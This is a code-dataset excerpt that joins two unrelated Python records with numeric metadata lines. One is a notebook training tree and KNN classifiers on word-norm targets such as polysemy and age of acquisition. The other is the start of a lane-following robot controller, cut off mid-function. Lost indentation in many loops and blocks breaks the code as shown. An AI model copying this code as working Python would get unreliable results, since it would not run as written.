print(classification_report(y_test, y_pred))
"""### Polysemy"""
refvar='polysemy'
taglio=0.67
X=df_class_ref.drop(refvar,axis=1).copy()
y=df_class_ref[refvar].copy()
y_up_index = y >= taglio
y[y_up_index]=1
y_zero_index = y < taglio
y[y_zero_index]=0
X_train, X_test, y_train, y_test = train_test_split(X, y, random_state = 42)
# Instantiate model with 10 decision trees
model = RandomForestClassifier(n_estimators = 385, random_state = 42)
# Train the model on training data
ra=model.fit(X_train, y_train)
#TESTING THE MODEL BY PREDICTING ON TEST DATA
#AND CALCULATE THE ACCURACY SCORE
prediction_test = model.predict(X_test)
#print(y_test, prediction_test)
#Print the prediction accuracy
print ("Accuracy = ", metrics.accuracy_score(y_test, prediction_test))
#Test accuracy for various test sizes and see how it gets better with more training data
#One amazing feature of Random forest is that it provides us info on feature importances
# Get numerical feature importances
#importances = list(model.feature_importances_)
#Let us print them into a nice format.
feature_list = list(X.columns)
feature_imp = pd.Series(model.feature_importances_,index=feature_list).sort_values(ascending=False)
print(feature_imp)
y_pred = model.predict(X_train)
y_pred = model.predict(X_test)
plot_confusion_matrix(ra,
X_test,
y_test,
display_labels=['not pol','pol']
)
y_score = model.predict_proba(X_test)
fpr, tpr, th = roc_curve(y_test, y_score[:,1])
roc_auc = auc(fpr, tpr)
print(roc_auc)
plt.figure(figsize=(8,5))
plt.plot(fpr, tpr, label='$AUC$ = %.3f' % (roc_auc))
plt.legend(loc="lower right", fontsize=14, frameon=False)
plt.plot([0,1], [0,1], 'k--')
plt.xlabel('False Positive Rate', fontsize=20)
plt.ylabel('True Positive Rate', fontsize=20)
plt.tick_params(axis='both', which='major', labelsize=22)
plt.show()
print('Accuracy %s' % accuracy_score(y_test, y_pred))
print('F1-score %s' % f1_score(y_test, y_pred,average='weighted'))
print(classification_report(y_test, y_pred))
"""### Age of Aquisition"""
refvar='aoa'
taglio=0.6
X=df_class_ref.drop(refvar,axis=1).copy()
y=df_class_ref[refvar].copy()
y_up_index = y >= taglio
y[y_up_index]=1
y_zero_index = y < taglio
y[y_zero_index]=0
X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=42)
# Instantiate model with 10 decision trees
model = RandomForestClassifier(n_estimators = 380, random_state = 42)
# Train the model on training data
ra=model.fit(X_train, y_train)
#TESTING THE MODEL BY PREDICTING ON TEST DATA
#AND CALCULATE THE ACCURACY SCORE
prediction_test = model.predict(X_test)
#print(y_test, prediction_test)
#Print the prediction accuracy
print ("Accuracy = ", metrics.accuracy_score(y_test, prediction_test))
#Test accuracy for various test sizes and see how it gets better with more training data
#One amazing feature of Random forest is that it provides us info on feature importances
# Get numerical feature importances
#importances = list(model.feature_importances_)
#Let us print them into a nice format.
feature_list = list(X.columns)
feature_imp = pd.Series(model.feature_importances_,index=feature_list).sort_values(ascending=False)
print(feature_imp)
y_pred = model.predict(X_train)
y_pred = model.predict(X_test)
plot_confusion_matrix(ra,
X_test,
y_test,
display_labels=['younger','older']
)
y_score = model.predict_proba(X_test)
fpr, tpr, th = roc_curve(y_test, y_score[:,1])
roc_auc = auc(fpr, tpr)
print(roc_auc)
plt.figure(figsize=(8,5))
plt.plot(fpr, tpr, label='$AUC$ = %.3f' % (roc_auc))
plt.legend(loc="lower right", fontsize=14, frameon=False)
plt.plot([0,1], [0,1], 'k--')
plt.xlabel('False Positive Rate', fontsize=20)
plt.ylabel('True Positive Rate', fontsize=20)
plt.tick_params(axis='both', which='major', labelsize=22)
plt.show()
print('Accuracy %s' % accuracy_score(y_test, y_pred))
print('F1-score %s' % f1_score(y_test, y_pred,average='weighted'))
print(classification_report(y_test, y_pred))
"""### Out of bag error"""
import matplotlib.pyplot as plt
from collections import OrderedDict
from sklearn.datasets import make_classification
from sklearn.ensemble import RandomForestClassifier
RANDOM_STATE = 42
refvar='valence'
taglio=0.67
X=df_class_ref.drop(refvar,axis=1).copy()
y=df_class_ref[refvar].copy()
y_up_index = y >= taglio
y[y_up_index]=1
y_zero_index = y < taglio
y[y_zero_index]=0
# NOTE: Setting the `warm_start` construction parameter to `True` disables
# support for parallelized ensembles but is necessary for tracking the OOB
# error trajectory during training.
ensemble_clfs = [
(
"RandomForestClassifier, max_features='sqrt'",
RandomForestClassifier(
warm_start=True,
oob_score=True,
max_features="sqrt",
random_state=RANDOM_STATE,
),
),
(
"RandomForestClassifier, max_features='log2'",
RandomForestClassifier(
warm_start=True,
max_features="log2",
oob_score=True,
random_state=RANDOM_STATE,
),
),
(
"RandomForestClassifier, max_features=None",
RandomForestClassifier(
warm_start=True,
max_features=None,
oob_score=True,
random_state=RANDOM_STATE,
),
),
]
# Map a classifier name to a list of (<n_estimators>, <error rate>) pairs.
error_rate = OrderedDict((label, []) for label, _ in ensemble_clfs)
# Range of `n_estimators` values to explore.
min_estimators = 100
max_estimators = 1000
for label, clf in ensemble_clfs:
for i in range(min_estimators, max_estimators + 1, 5):
clf.set_params(n_estimators=i)
clf.fit(X, y)
# Record the OOB error for each `n_estimators=i` setting.
oob_error = 1 - clf.oob_score_
error_rate[label].append((i, oob_error))
# Generate the "OOB error rate" vs. "n_estimators" plot.
for label, clf_err in error_rate.items():
xs, ys = zip(*clf_err)
plt.plot(xs, ys, label=label)
plt.xlim(min_estimators, max_estimators)
plt.xlabel("n_estimators")
plt.ylabel("OOB error rate")
plt.legend(loc="upper right")
plt.show()
"""## Entropy (Decision Tree)
### Age of Acquisition
"""
refvar="aoa"
taglio=0.6
X=df_class_ref.drop(refvar,axis=1).copy()
y=df_class_ref[refvar].copy()
y_up_index = y >= taglio
y[y_up_index]=1
y_zero_index = y < taglio
y[y_zero_index]=0
# --- Decision tree with cost-complexity pruning (binary age target) ---
# Baseline (unpruned) tree on a held-out split.
X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=42)
clf_dt = DecisionTreeClassifier(criterion='entropy', max_depth=None,
                                min_samples_split=2, min_samples_leaf=1,
                                random_state=42)
clf_dt = clf_dt.fit(X_train, y_train)

# Candidate pruning strengths; the last alpha prunes down to the bare
# root, so drop it.
path = clf_dt.cost_complexity_pruning_path(X_train, y_train)
ccp_alphas = path.ccp_alphas
ccp_alphas = ccp_alphas[:-1]

# Fit one tree per candidate alpha.
clf_dts = []
for ccp_alpha in ccp_alphas:
    clf_dt = DecisionTreeClassifier(criterion='entropy', random_state=0,
                                    ccp_alpha=ccp_alpha)
    clf_dt.fit(X_train, y_train)
    clf_dts.append(clf_dt)

# Train/test accuracy as a function of alpha.
train_scores = [clf_dt.score(X_train, y_train) for clf_dt in clf_dts]
test_scores = [clf_dt.score(X_test, y_test) for clf_dt in clf_dts]
fig, ax = plt.subplots()
ax.set_xlabel("alpha")
ax.set_ylabel("accuracy")
ax.set_title("Accuracy vs alpha for training and testing sets")
ax.plot(ccp_alphas, train_scores, marker='o', label='train', drawstyle='steps-post')
ax.plot(ccp_alphas, test_scores, marker='o', label='test', drawstyle='steps-post')
ax.legend()
plt.show()

# 10-fold CV accuracy (mean +/- std) per alpha.
alpha_loop_values = []
for ccp_alpha in ccp_alphas:
    clf_dt = DecisionTreeClassifier(criterion='entropy', max_depth=None,
                                    min_samples_split=2, min_samples_leaf=1,
                                    random_state=0, ccp_alpha=ccp_alpha)
    scores = cross_val_score(clf_dt, X_train, y_train, cv=10)
    alpha_loop_values.append([ccp_alpha, np.mean(scores), np.std(scores)])
alpha_results = pd.DataFrame(alpha_loop_values,
                             columns=['alpha', 'mean_accuracy', 'std'])
alpha_results.plot(x='alpha', y='mean_accuracy', yerr='std',
                   marker='o', linestyle='-')

# Notebook-style inspection of a promising alpha window (value displayed,
# not used further).
alpha_results[(alpha_results['alpha'] > 0.002)
              & (alpha_results['alpha'] < 0.004)]

# Alpha with the best mean CV accuracy.
indexmax = alpha_results[['mean_accuracy']].idxmax()
maxalpha = alpha_results.loc[indexmax, 'alpha']
ideal_ccp_alpha = float(maxalpha)
print(ideal_ccp_alpha)

# Final pruned tree, evaluated on the held-out test set.
clf_dt_pruned = DecisionTreeClassifier(criterion='entropy', max_depth=None,
                                       min_samples_split=2, min_samples_leaf=1,
                                       random_state=42, ccp_alpha=ideal_ccp_alpha)
clf_dt_pruned = clf_dt_pruned.fit(X_train, y_train)
plot_confusion_matrix(clf_dt_pruned, X_test, y_test,
                      display_labels=['young', 'old'])
plt.figure(figsize=(15, 7.5))
from sklearn.tree import plot_tree
plot_tree(clf_dt_pruned, filled=True, rounded=True,
          class_names=["young", "old"], feature_names=X.columns)

# Test-set metrics.  (A train-set prediction that was immediately
# overwritten has been removed.)
y_pred = clf_dt_pruned.predict(X_test)
print('Accuracy %s' % accuracy_score(y_test, y_pred))
print('F1-score %s' % f1_score(y_test, y_pred, average=None))
print(classification_report(y_test, y_pred))

# ROC curve for the positive class.
y_score = clf_dt_pruned.predict_proba(X_test)
fpr, tpr, th = roc_curve(y_test, y_score[:, 1])
roc_auc = auc(fpr, tpr)
print(roc_auc)
plt.figure(figsize=(8, 5))
plt.plot(fpr, tpr, label='$AUC$ = %.3f' % (roc_auc))
plt.legend(loc="lower right", fontsize=14, frameon=False)
plt.plot([0, 1], [0, 1], 'k--')
plt.xlabel('False Positive Rate', fontsize=20)
plt.ylabel('True Positive Rate', fontsize=20)
plt.tick_params(axis='both', which='major', labelsize=22)
plt.show()
"""### Polysemy"""
refvar="polysemy"
taglio=0.6
X=df_class_ref.drop(refvar,axis=1).copy()
y=df_class_ref[refvar].copy()
y_up_index = y >= taglio
y[y_up_index]=1
y_zero_index = y < taglio
y[y_zero_index]=0
X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=42)
clf_dt = DecisionTreeClassifier(criterion='entropy', max_depth=None, min_samples_split=2, min_samples_leaf=1,random_state=42)
clf_dt = clf_dt.fit(X_train, y_train)
path = clf_dt.cost_complexity_pruning_path(X_train, y_train)
ccp_alphas = path.ccp_alphas
ccp_alphas = ccp_alphas[:-1]
clf_dts=[]
for ccp_alpha in ccp_alphas:
clf_dt = DecisionTreeClassifier(criterion='entropy',random_state=0, ccp_alpha=ccp_alpha)
clf_dt.fit(X_train, y_train)
clf_dts.append(clf_dt)
train_scores = [clf_dt.score(X_train, y_train) for clf_dt in clf_dts]
test_scores = [clf_dt.score(X_test, y_test) for clf_dt in clf_dts]
fig, ax =plt.subplots()
ax.set_xlabel("alpha")
ax.set_ylabel("accuracy")
ax.set_title("Accuracy vs alpha for training and testing sets")
ax.plot(ccp_alphas,train_scores, marker ='o',label='train',drawstyle='steps-post')
ax.plot(ccp_alphas,test_scores, marker ='o',label='test',drawstyle='steps-post')
ax.legend()
plt.show()
alpha_loop_values =[]
for ccp_alpha in ccp_alphas:
clf_dt = DecisionTreeClassifier(criterion='entropy', max_depth=None, min_samples_split=2, min_samples_leaf=1,random_state=0, ccp_alpha=ccp_alpha)
scores= cross_val_score(clf_dt,X_train,y_train, cv=10)
alpha_loop_values.append([ccp_alpha,np.mean(scores), np.std(scores)])
alpha_results = pd.DataFrame(alpha_loop_values,
columns=['alpha','mean_accuracy','std'])
alpha_results.plot(x='alpha',
y='mean_accuracy',
yerr='std',
marker='o',
linestyle='-')
alpha_results[(alpha_results['alpha']>0.002)
]
indexmax = alpha_results[['mean_accuracy']].idxmax()
maxalpha=alpha_results.loc[indexmax,'alpha']
ideal_ccp_alpha = float(maxalpha)
print(ideal_ccp_alpha)
clf_dt_pruned = DecisionTreeClassifier(criterion='entropy', max_depth=None, min_samples_split=2, min_samples_leaf=1,random_state=42, ccp_alpha=ideal_ccp_alpha)
clf_dt_pruned = clf_dt_pruned.fit(X_train, y_train)
plot_confusion_matrix(clf_dt_pruned,
X_test,
y_test,
display_labels=['not polysemic','polysemic'])
plt.figure(figsize=(15,7.5))
from sklearn.tree import plot_tree
plot_tree(clf_dt_pruned,
filled=True,
rounded=True,
class_names=["not polysemic","polysemic"],
feature_names=X.columns)
y_pred = clf_dt_pruned.predict(X_train)
y_pred = clf_dt_pruned.predict(X_test)
print('Accuracy %s' % accuracy_score(y_test, y_pred))
print('F1-score %s' % f1_score(y_test, y_pred, average=None))
print(classification_report(y_test, y_pred))
y_score = clf_dt_pruned.predict_proba(X_test)
fpr, tpr, th = roc_curve(y_test, y_score[:,1])
roc_auc = auc(fpr, tpr)
print(roc_auc)
plt.figure(figsize=(8,5))
plt.plot(fpr, tpr, label='$AUC$ = %.3f' % (roc_auc))
plt.legend(loc="lower right", fontsize=14, frameon=False)
plt.plot([0,1], [0,1], 'k--')
plt.xlabel('False Positive Rate', fontsize=20)
plt.ylabel('True Positive Rate', fontsize=20)
plt.tick_params(axis='both', which='major', labelsize=22)
plt.show()
"""### Valence"""
refvar="valence"
taglio=0.67
X=df_class_ref.drop(refvar,axis=1).copy()
y=df_class_ref[refvar].copy()
y_up_index = y >= taglio
y[y_up_index]=1
y_zero_index = y < taglio
y[y_zero_index]=0
X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=42)
clf_dt = DecisionTreeClassifier(criterion='entropy', max_depth=None, min_samples_split=2, min_samples_leaf=1,random_state=42)
clf_dt = clf_dt.fit(X_train, y_train)
path = clf_dt.cost_complexity_pruning_path(X_train, y_train)
ccp_alphas = path.ccp_alphas
ccp_alphas = ccp_alphas[:-1]
clf_dts=[]
for ccp_alpha in ccp_alphas:
clf_dt = DecisionTreeClassifier(random_state=0, ccp_alpha=ccp_alpha)
clf_dt.fit(X_train, y_train)
clf_dts.append(clf_dt)
train_scores = [clf_dt.score(X_train, y_train) for clf_dt in clf_dts]
test_scores = [clf_dt.score(X_test, y_test) for clf_dt in clf_dts]
fig, ax =plt.subplots()
ax.set_xlabel("alpha")
ax.set_ylabel("accuracy")
ax.set_title("Accuracy vs alpha for training and testing sets")
ax.plot(ccp_alphas,train_scores, marker ='o',label='train',drawstyle='steps-post')
ax.plot(ccp_alphas,test_scores, marker ='o',label='test',drawstyle='steps-post')
ax.legend()
plt.show()
alpha_loop_values =[]
for ccp_alpha in ccp_alphas:
clf_dt = DecisionTreeClassifier(criterion='entropy', max_depth=None, min_samples_split=2, min_samples_leaf=1,random_state=0, ccp_alpha=ccp_alpha)
scores= cross_val_score(clf_dt,X_train,y_train, cv=10)
alpha_loop_values.append([ccp_alpha,np.mean(scores), np.std(scores)])
alpha_results = pd.DataFrame(alpha_loop_values,
columns=['alpha','mean_accuracy','std'])
alpha_results.plot(x='alpha',
y='mean_accuracy',
yerr='std',
marker='o',
linestyle='-')
alpha_results[(alpha_results['alpha']>0.0025)
&
(alpha_results['alpha']<0.0035)]
indexmax = alpha_results[['mean_accuracy']].idxmax()
maxalpha=alpha_results.loc[indexmax,'alpha']
ideal_ccp_alpha = float(maxalpha)
print(ideal_ccp_alpha)
clf_dt_pruned = DecisionTreeClassifier(criterion='entropy', max_depth=None, min_samples_split=2, min_samples_leaf=1,random_state=42, ccp_alpha=ideal_ccp_alpha)
clf_dt_pruned = clf_dt_pruned.fit(X_train, y_train)
plot_confusion_matrix(clf_dt_pruned,
X_test,
y_test,
display_labels=['not valuable','valuable'])
plt.figure(figsize=(15,7.5))
from sklearn.tree import plot_tree
plot_tree(clf_dt_pruned,
filled=True,
rounded=True,
class_names=["not valuable","valuable"],
feature_names=X.columns)
y_pred = clf_dt_pruned.predict(X_train)
y_pred = clf_dt_pruned.predict(X_test)
print('Accuracy %s' % accuracy_score(y_test, y_pred))
print('F1-score %s' % f1_score(y_test, y_pred, average=None))
print(classification_report(y_test, y_pred))
y_score = clf_dt_pruned.predict_proba(X_test)
fpr, tpr, th = roc_curve(y_test, y_score[:,1])
roc_auc = auc(fpr, tpr)
print(roc_auc)
plt.figure(figsize=(8,5))
plt.plot(fpr, tpr, label='$AUC$ = %.3f' % (roc_auc))
plt.legend(loc="lower right", fontsize=14, frameon=False)
plt.plot([0,1], [0,1], 'k--')
plt.xlabel('False Positive Rate', fontsize=20)
plt.ylabel('True Positive Rate', fontsize=20)
plt.tick_params(axis='both', which='major', labelsize=22)
plt.show()
"""# Multisplit target"""
df_class_ref = dfprepro.copy()
dataframe = [df_class_ref]
for dataset in dataframe:
dataset.loc[(dataset["aoa"] > 1) & (dataset["aoa"] <= 2), "aoa"] = 1
dataset.loc[(dataset["aoa"] > 2)& (dataset["aoa"] <= 3), "aoa"] = 2
dataset.loc[(dataset["aoa"] > 3)& (dataset["aoa"] <= 4), "aoa"] = 3
dataset.loc[(dataset["aoa"] > 4)& (dataset["aoa"] <= 5), "aoa"] = 4
dataset.loc[(dataset["aoa"] > 5)& (dataset["aoa"] <= 6), "aoa"] = 5
dataset.loc[(dataset["aoa"] > 6)&( dataset["aoa"] <= 7), "aoa"] = 6
dataset.loc[(dataset["aoa"] > 7), "aoa"] = 7
df_class_ref.head()
var_to_scale=["arousal","valence","dominance","familiarity","semsize","masculinity","perceivability"]
features = df_class_ref[var_to_scale]
scaler = MinMaxScaler().fit(features.values)
features = scaler.transform(features.values)
df_class_ref[var_to_scale] = features
df_class_ref.head()
"""### Age of Aquisition (DT)"""
refvar="aoa"
X=df_class_ref.drop(refvar,axis=1).copy()
y=df_class_ref[refvar].copy()
X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=42)
clf_dt = DecisionTreeClassifier(criterion='gini', max_depth=None, min_samples_split=2, min_samples_leaf=1,random_state=42)
clf_dt = clf_dt.fit(X_train, y_train)
path = clf_dt.cost_complexity_pruning_path(X_train, y_train)
ccp_alphas = path.ccp_alphas
ccp_alphas = ccp_alphas[:-1]
clf_dts=[]
for ccp_alpha in ccp_alphas:
clf_dt = DecisionTreeClassifier(random_state=0, ccp_alpha=ccp_alpha)
clf_dt.fit(X_train, y_train)
clf_dts.append(clf_dt)
train_scores = [clf_dt.score(X_train, y_train) for clf_dt in clf_dts]
test_scores = [clf_dt.score(X_test, y_test) for clf_dt in clf_dts]
fig, ax =plt.subplots()
ax.set_xlabel("alpha")
ax.set_ylabel("accuracy")
ax.set_title("Accuracy vs alpha for training and testing sets")
ax.plot(ccp_alphas,train_scores, marker ='o',label='train',drawstyle='steps-post')
ax.plot(ccp_alphas,test_scores, marker ='o',label='test',drawstyle='steps-post')
ax.legend()
plt.show()
alpha_loop_values =[]
for ccp_alpha in ccp_alphas:
clf_dt = DecisionTreeClassifier(criterion='gini', max_depth=None, min_samples_split=2, min_samples_leaf=1,random_state=0, ccp_alpha=ccp_alpha)
scores= cross_val_score(clf_dt,X_train,y_train, cv=10)
alpha_loop_values.append([ccp_alpha,np.mean(scores), np.std(scores)])
alpha_results = pd.DataFrame(alpha_loop_values,
columns=['alpha','mean_accuracy','std'])
alpha_results.plot(x='alpha',
y='mean_accuracy',
marker='o',
linestyle='--')
alpha_results[(alpha_results['alpha']>0.0015)
&
(alpha_results['alpha']<0.0022)]
ideal_ccp_alpha = 0.001858
ideal_ccp_alpha = float(ideal_ccp_alpha)
clf_dt_pruned = DecisionTreeClassifier(criterion='entropy', max_depth=None, min_samples_split=2, min_samples_leaf=1,random_state=42, ccp_alpha=ideal_ccp_alpha)
clf_dt_pruned = clf_dt_pruned.fit(X_train, y_train)
plot_confusion_matrix(clf_dt_pruned,
X_test,
y_test,
display_labels=['0-2','2-4','4-6','6-8','8-10','10-12'])
plt.figure(figsize=(15,7.5))
from sklearn.tree import plot_tree
plot_tree(clf_dt_pruned,
filled=True,
rounded=True,
class_names=['0-2','2-4','4-6','6-8','8-10','10-12'],
feature_names=X.columns)
y_pred = clf_dt_pruned.predict(X_train)
y_pred = clf_dt_pruned.predict(X_test)
print('Accuracy %s' % accuracy_score(y_test, y_pred))
print('F1-score %s' % f1_score(y_test, y_pred,average=None))
print(classification_report(y_test, y_pred))
print(clf_dt_pruned.predict_proba(X_test))
report = classification_report(y_test, y_pred, output_dict=True)
export = pd.DataFrame(report).transpose()
print(export.to_latex())
plt.show()
"""### Age of Acquisition (KNN)
#### choice of k
"""
from sklearn.neighbors import KNeighborsClassifier
refvar="aoa"
X=df_class_ref.drop(refvar,axis=1).copy()
y=df_class_ref[refvar].copy()
X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=42)
k = 4
neigh = KNeighborsClassifier(n_neighbors = k).fit(X_train,y_train)
Pred_y = neigh.predict(X_test)
error_rate = []
for i in range(1,100):
knn = KNeighborsClassifier(n_neighbors=i)
knn.fit(X_train,y_train)
pred_i = knn.predict(X_test)
error_rate.append(np.mean(pred_i != y_test))
plt.figure(figsize=(10,6))
plt.plot(range(1,100),error_rate,color='blue', linestyle='dashed',
marker='o',markerfacecolor='red', markersize=10)
plt.title('Error Rate vs. K Value')
plt.xlabel('K')
plt.ylabel('Error Rate')
print("Minimum error:-",min(error_rate),"at K =",error_rate.index(min(error_rate)))
clf_knn = KNeighborsClassifier(n_neighbors=14)
clf_knn.fit(X, y)
y_pred = clf_knn.predict(X_train)
print('Accuracy', accuracy_score(y_train, y_pred))
print('F1', f1_score(y_train, y_pred, average='weighted'))
print( classification_report(y_train, y_pred) )
confusion_matrix(y_train, y_pred)
y_pred = clf_knn.predict(X_test)
print('Accuracy %s' % accuracy_score(y_test, y_pred))
print('F1-score %s' % f1_score(y_test, y_pred, average='weighted'))
print(classification_report(y_test, y_pred))
print(confusion_matrix(y_test, y_pred))
plot_confusion_matrix(clf_knn,
X_test,
y_test,
display_labels=['0-2','2-4','4-6','6-8','8-10'])
y_score = clf_knn.predict_proba(X_test)
report = classification_report(y_test, y_pred, output_dict=True)
export = pd.DataFrame(report).transpose()
print(export.to_latex())
| 28.800226
| 159
| 0.723478
| 16,782
| 102,068
| 4.098677
| 0.027649
| 0.034601
| 0.020455
| 0.030181
| 0.940858
| 0.93292
| 0.928806
| 0.925012
| 0.922569
| 0.917335
| 0
| 0.020442
| 0.13347
| 102,068
| 3,544
| 160
| 28.800226
| 0.757262
| 0.043412
| 0
| 0.922545
| 1
| 0
| 0.088119
| 0.000713
| 0
| 0
| 0
| 0
| 0
| 1
| 0.000461
| false
| 0
| 0.026279
| 0
| 0.02674
| 0.078377
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
db419cc536faa492920d3742901bc8588e6578fb
| 58,653
|
py
|
Python
|
submission/code/modular/decide.py
|
NNpanpan/CS4278-5478-Project-Materials
|
f577f8beba9b96d63c31802d16c286749a3f7918
|
[
"MIT"
] | null | null | null |
submission/code/modular/decide.py
|
NNpanpan/CS4278-5478-Project-Materials
|
f577f8beba9b96d63c31802d16c286749a3f7918
|
[
"MIT"
] | null | null | null |
submission/code/modular/decide.py
|
NNpanpan/CS4278-5478-Project-Materials
|
f577f8beba9b96d63c31802d16c286749a3f7918
|
[
"MIT"
] | null | null | null |
from modular.lane_detection.lane import inspect_box, detect_lane, has_red_bar, is_pit
from modular.sign_recognition.detect_stop_sign import stop_detect
import numpy as np
import os
import argparse
class Controller:
def __init__(self, has_pit=False, has_intersection=False, has_stop_sign=False):
    """Set up per-episode controller state.

    has_pit / has_intersection / has_stop_sign flag which map features
    this controller must watch for.
    """
    # Queued [speed, steer] actions, consumed LIFO via pop().
    self.buffer = []
    # Turning / navigation state.
    self.turning = 0
    self.turn_left_incoming = False
    self.turn_right_incoming = False
    self.turning_right = False
    self.turn_right_prep = -1
    self.turn_right_prep_angles = [0, -1, 0.5, 1]
    self.locating_turns = 1
    self.forwarding = False
    self.alt = True
    # True once the bot believes it sits between the two lane markings.
    self.middle = False
    # Map features.
    self.intersection = has_intersection
    self.stop_sign = has_stop_sign
    self.has_pit = has_pit
    # Stop-sign handling and intersection crossing.
    self.seeing_stop = False
    self.remaining_steps_of_slow = 0
    self.passing_intersection = False
def load_actions(self, actions):
    """Queue a scripted sequence of (speed, steer) actions.

    The buffer is consumed with pop(), so the whole buffer is reversed
    after loading to play the sequence front-to-back.
    """
    self.buffer += [[speed, steer] for speed, steer in actions]
    self.buffer.reverse()
    self.middle = True
def stop_speed(self, speed):
    """Return *speed*, or a 0.1 crawl while a slowdown is scheduled.

    Each call during a slowdown consumes one step of the countdown.
    """
    if self.remaining_steps_of_slow > 0:
        self.remaining_steps_of_slow -= 1
        return 0.1
    return speed
def detect_stop(self, obs):
    """Track stop-sign visibility and schedule a slowdown once it passes.

    NOTE(review): the source's indentation was lost; this flat if-chain is
    the reconstruction consistent with the original comments -- confirm.
    """
    has_stop = stop_detect(obs)
    print("Stop detection: ", has_stop)
    # Not seeing the stop sign yet: latch the current detection.
    if not self.seeing_stop:
        self.seeing_stop = has_stop
    if has_stop:
        # Sign (still) in view: stay latched, no slowdown yet.
        self.seeing_stop = True
        self.remaining_steps_of_slow = 0
        return
    if self.seeing_stop == True:
        # Sign just left the view: creep for 200 steps.
        self.seeing_stop = False
        self.remaining_steps_of_slow = 200
def predict(self, rgb_array=None, raw_obs=None):
    """Decide the next [speed, steer] action from the camera frame.

    rgb_array: camera image (the inspect_box coordinates below assume an
    800x600 frame -- TODO confirm).
    raw_obs: raw observation, used only for stop-sign detection.
    Returns a [speed, steer] pair.

    BUG FIX: the empty-lane check was `lines is []`, which is always
    False (identity against a fresh list); changed to `not lines`.
    Large blocks of commented-out dead code were removed.
    """
    print("Status ", self.turn_left_incoming, self.turn_right_incoming, self.middle)
    if rgb_array is None:
        return [0, 0]
    image = np.array(rgb_array)

    # Drain any pre-planned actions first.
    if self.buffer != []:
        action = self.buffer.pop()
        if self.stop_sign and raw_obs is not None:
            self.detect_stop(raw_obs)
        return action

    # For maps with pits: swerve hard left when a pit fills the view.
    if self.has_pit and is_pit(rgb_array, 100, 200, 699, 399) > 0.9:
        self.buffer = [[0.1, 1.0]] * 62
        self.middle = False
        return [0.1, 1.0]

    # For maps with stop signs.
    if self.stop_sign and raw_obs is not None:
        self.detect_stop(raw_obs)

    lines, pos_slope_avg, neg_slope_avg = detect_lane(rgb_array=image)
    print("Slopes ", pos_slope_avg, neg_slope_avg)
    if not lines:
        return [1.0, 1]

    psa = 0 if pos_slope_avg is None else pos_slope_avg
    nsa = 0 if neg_slope_avg is None else neg_slope_avg
    # Steer toward the side with the weaker slope, clamped to [-1, 1].
    steerer = abs(nsa) - psa
    if steerer < 0:
        steerer = max(steerer, -1)
    if steerer > 0:
        steerer = min(steerer, 1)

    # Colour statistics in three regions of the frame.
    yellow_b_l, white_b_l, max_g_b_l = inspect_box(image, 0, 300, 399, 599)    # bottom-left
    yellow_b_r, white_b_r, max_g_b_r = inspect_box(image, 400, 300, 799, 599)  # bottom-right
    yellow_b_s, white_b_s, max_g_b_s = inspect_box(image, 200, 500, 599, 599)  # bottom stripe
    print("Yellows ", yellow_b_l, yellow_b_s, yellow_b_r)
    print("Whites ", white_b_l, white_b_s, white_b_r)
    print("Max green vals ", max_g_b_l, max_g_b_s, max_g_b_r)

    # Big assumption of intersection: always have either left or forward.
    if self.passing_intersection:
        if white_b_l > 0.01 and white_b_r > 0.01:
            # Approaching the sideway: have to turn left.
            if self.remaining_steps_of_slow > 0:
                fwd_steps = [[0.1, 0]] * 50
                buf_steps = [[0.1, 0]] * 10
                self.remaining_steps_of_slow = 10
            else:
                fwd_steps = [[0.44, 0]] * 16
                buf_steps = [[0.44, 0]] * 3
            self.buffer = fwd_steps + [[0.1, 1]] * 30 + buf_steps
            self.passing_intersection = False
            return self.buffer.pop()
        # Otherwise it is okay to go straight through.
        if self.remaining_steps_of_slow > 0:
            fwd_steps = [[0.1, 0]] * 50
            self.remaining_steps_of_slow = 0
        else:
            fwd_steps = [[0.44, 0]] * 16
        self.buffer = fwd_steps
        self.passing_intersection = False
        return self.buffer.pop()

    # Not yet between the two lane markings: locate the lane.
    if not self.middle:
        if yellow_b_l > 0.02 and white_b_l < 0.0001 and white_b_r > 0.0001:
            if yellow_b_s > 0.001:
                # Yellow under the bot: back out and spin right.
                if psa > 0.25:
                    self.buffer = [[0.1, 0], [0.1, -1], [0.1, -1]] * 8 + [[-self.stop_speed(0.35), 0]]
                else:
                    self.buffer = [[0.1, 0], [0.1, -1], [0.1, -1]] * 10 + [[-self.stop_speed(0.35), 0]]
                return self.buffer.pop()
            # Between the two lanes already.
            self.middle = True
            if steerer > 0:
                return [self.stop_speed(0.44), 1]
            else:
                return [self.stop_speed(0.44), -1]
        elif yellow_b_l > 0.02 and white_b_l < 0.0001 and white_b_r <= 0.0001:
            if psa > 0.5:
                # Between 2 lanes, a bit close to the left lane.
                return [self.stop_speed(0.44), steerer]
            else:
                # Positive slope too small: spin right by varying amounts.
                if yellow_b_s < 0.1:
                    return [0.1, 1]
                elif psa < 0.1:
                    self.buffer = [[0.1, 0], [0.1, -1], [0.1, -1]] * 16
                    return self.buffer.pop()
                elif psa < 0.2:
                    self.buffer = [[0.1, 0], [0.1, -1], [0.1, -1]] * 8
                    return self.buffer.pop()
                else:
                    self.buffer = [[0.1, 0], [0.1, -1], [0.1, -1]] * 4
                    return self.buffer.pop()
        elif yellow_b_l > 0.02 and white_b_r > 0.02 and yellow_b_r > 0.02:
            # Definitely grass on the right.
            return [self.stop_speed(0.44), 1]
        elif yellow_b_l <= 0.02:
            if yellow_b_r > 0.02 and white_b_r > 0.02:
                if white_b_l < 0.02:
                    # Probably the grass; turn left to find out more.
                    return [0.1, 1]
                else:
                    # Unclear scene: back down.
                    return [-self.stop_speed(0.44), 0]
            if white_b_l > 0.02 and white_b_r > 0.02:
                # Could be grass ahead or the map edge; false edges may be
                # detected, so back down a bit.
                return [-self.stop_speed(0.44), 0]
            if white_b_r > 0.02:
                return [self.stop_speed(0.44), 1]
            if white_b_l > 0.02 and yellow_b_r > 0.02:
                # Facing the wrong way: turn around, guided by the slopes.
                if pos_slope_avg is not None and pos_slope_avg < 0.6:
